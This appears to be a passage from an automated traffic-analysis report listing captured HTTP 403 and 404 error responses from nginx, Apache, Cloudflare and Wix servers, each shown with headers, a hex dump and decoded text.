                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:27 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:27 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfppWgLIEGkYABcYufcc5cq,qquldgcFrj2n046g4RNSVIrig9SAqnXW0O7zAzsQkQs=X-Wix-Request-Id: 1678431327.2918743350616812X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:27 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NGOg00PBJerhTjHY7o1K933Bb17dM1zPiRYoqeqZkG7rP5VF44dKDffZL%2Fd5WH9ZbEI%2Bf6isSHUnDklX0XWFo7K3Wpk4%2BepSieFIKqCCeYHSvkqOxVur8Fn52Tr46uw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a6f40d113626-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:27 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:27 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:55:29 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pA5QVYQrE22taFwmINIb252pM5m8IOCHnRyV1dbzYDMO11YPoBIAII6x9lEQISwVeBNmpZRbqq9WgF8ENNIVIAaD4nL3i%2FEv2D8F43eKqommafAdvcWrb4BfkKwgkXFm7%2B4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a708f8e83a8c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-size:
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:55:31 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:31 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NZL9Lwun+M+7c/tw2Pto8/H/B1auawY2i/M3rmDg6tWR,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1678431331.996129816603216769X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:32 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2Q9kHyK3qNm%2F81hJWrVWT6Yjavl5mOT0Z0fV1ioNVA3%2FLfKdCAFzSJySYrGbhWG377U9NbCFcaEkWkYbn6mmQ1%2B4R0vo4XqKVRhrznv80ORiEwz%2Ff7tTV9%2BKCWSvb1DE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a710f8b52c57-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:32 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Xu8yfKKOEEHT0tqNN3YcAtd0eajjgUclMH1nDNE9Ry6C8BjhzV0T3Fdtctw6Bg6Ic2KhVbON5SbJ53ikmBEnN%2FQvthH5KMG8%2F0gAT8QfMlrWaUTNkWxyu3Di%2FzyzzNRg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a7122a2d2c57-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:55:32 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 